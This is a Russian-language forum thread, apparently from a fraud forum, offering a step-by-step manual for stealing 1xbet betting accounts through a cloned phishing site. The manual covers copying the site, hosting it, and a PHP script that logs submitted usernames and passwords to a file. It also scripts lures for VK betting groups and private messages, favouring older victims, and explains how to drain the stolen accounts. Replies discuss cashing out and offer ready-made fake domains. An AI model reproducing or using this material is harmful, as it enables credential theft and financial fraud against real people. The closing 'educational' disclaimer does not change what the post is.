Как заработать на фейке 1xbet

WitcherMan

Участник
Дней с нами
3.258
Розыгрыши
0
Сообщения
37
Репутация
11
Реакции
109
Попросили слить тему одного человека, который занимается этим, держите:
С недавнего времени контора 1xbet убрала подтверждение вывода денег по смс. Но если всё же у жертвы телефон привязан то нужно получать код по смс. Как правило привязка есть у 3 аккаунтов из 10. Контора очень популярная, в день имел 2-3 аккаунта(я очень ленивый человек и хочу себе кнопочку бабло но так как её нету я продаю данный мануал).

Заработок будет на фейк сайте 1xbet. Зеркало найти реально трудно,много людей просто не могут найти зеркло, поэтому люди будут заинтересованы в нашем сайте. Плагин делает точную копию сайта

Этим способом заработал за день 30к, попался мне вот такой человек. Способ для тех, кто шарит, кто нет, пишите свои акки от хостингера, создам вам сайт, у меня займет минут 10.

Для начала качаем FireFOx
Ставим плагин --Ссылка удалена-- -
Гуглим зеркало 1xbet http://www9.1xbetru.ru/zerkalo-sayta-1xbet/

Заходим на сайт, обычно ссылки длинные, удаляем все лишнее
Пример --Ссылка удалена--
Делаем --Ссылка удалена--

Правый клик в любое место на 1xbet, сохранить страницу как Выбираем все галочки, javascript тоже,глубина скачки по умолчанию должна стоять 0 если не стоит ставим. Ждем, после появится поле. Если не появиться данное поле то нечего страшного в этом нет!
upload_2017-4-17_19-42-36.png

Жмем остановить Галочки стоят везде, оставляем там, где наш адрес 1xwol.xyz
Если у вас будет другой адрес, то ставьте свои галочки. Ждем, после закачки жмем на клавиатуре win+R
upload_2017-4-17_19-43-22.png

Пишем appdata либо %appdata%
Далее идем в папку roaming/Mozilla/FireFox/profiles/профиль(набор английских букв)/ScrapBook/Data/(папка с цифрами) дальше можете открыть, проверить (любой файл, с названием default.html)
Все, это полная копия сайта 1xbet. Не отличить.

Далее, нужно зарегистрироваться на hostinger.ru
Теперь там платная регистрация, но на hostinger.com.ar бесплатная, но сайт аргентинский.
Дальше качаем FileZilla
Создаем новый сайт, адрес выбирайте типа 1xwizo.hol.es По ftp заливайте все файлы из папки, где копия 1xbet Прежде удалите все файлы с сервака подрубайте скрипт на запись логина и пароля, есть везде
Код:
<?PHP
$Log = $_POST['login'];
$Pass = $_POST['password'];
$log = fopen("database.txt","at");
fwrite($log,"\n $Log:$Pass \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://lleo.aha.ru/na/'></head></html>";
?>

Типо того, настраиваете под себя.
Все, сайт готов, теперь можно покидать по разным группам ставок сообщения типа “нашел нормальное рабочее зеркало 1xbet, работает постоянно,” ну и ссылочку на сайт наш. Просто в поиске групп вк пишите – прогнозы на спорт, или ставки, ищите с коментами. Также расфорсить ссылку можете и сами, вариантов куча Есть варик писать людям в лс, которые есть в этих группах(писать лучше людям по старше, т.к они заливают больше денег), типа “Здарова, не подкинешь рабочий 1xbet, ” потом пишете “Все, я нашел нормальный, прости за беспокойство” и кидаете наш сайт После того, как заполучили акк, выводим деньги, если нашли пустой акк, то ждите, пока зальют туда бабки

Внимание! ВСЯ ИНФОРМАЦИЯ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, ЧТОБЫ ПОКАЗАТЬ КАК РАБОТАЮТ МОШЕННИКИ! Будьте бдительны!
 
годно, но мне лень
 
  • Like
Реакции: RarSlut
ну, это типо, если тебя спалят и возьмут за задницу, то он ни причём
А, т.е. если я не против, чтобы меня потрогали за задницу, то я должен всё так, как там написано? :kappa:
 
  • Like
Реакции: RarSlut и MaxdY
Чет не врубаюсь, сайт залил, все дела, но кликая на что либо, возвращаюсь на исходный сайт, ну и так, время стоит, и вообще сайт не живой, если просто прокликать на всякое. Я конечно сайты никогда не делал, по этому даже хз куда скрипт с регистрацией засунуть, эту схему бы для чайников разжевать, и можно на продажу кинуть.
 
Годно, буду пробовать
 
под хайд бы
 
Чисто теоретически ко мне в окно может залететь собр?:9:
 
  • Like
Реакции: Petrark
А как насчет того что выводить можно только на тот счет с которого пришли деньги ? И даже чтобы отправить другу надо уже подтверждать номер ( хотя можно левый подтвердить и отправить на др аккаунт ) И в итоге как выводить деньги с аккаунтов ???
 
  • Like
Реакции: mobe dick
Способ высосан из пальца, скрипт на запись пароля не работает даже с изменными параметрами. На реале 1хбет есть время и лайв ставки, на фейке они не меняются.
Чисто для интереса попробую , время и все остальное можно самому подкоректировать . А так через kali linux можно просто фейк главной стр создавать и там логи сразу в консоль приходят . а вот что делать с Live хз , он как скопирнулся так и стоит , ну мб мамонты на это не будут обращать внимания . Хотя толку в этом мало тк вывод один фиг только на счет с которого поступило бабло :(
 
Последнее редактирование:
Есть кто юзает?
 
если кто то юзает просьба помоч с настройкой скриптов и несколько мелочей в замен расскажу как выводить с этой чудо конторы
 
Юзаю, готов помочь взамен на тему с выводом
+
Есть готовые фейки на
Leonrf.xyz
1xbbet.pw
Olimpkz.xyz


Короче дохуя какие есть и могут сделать за $ или тему по выводу средств.
 

Похожие темы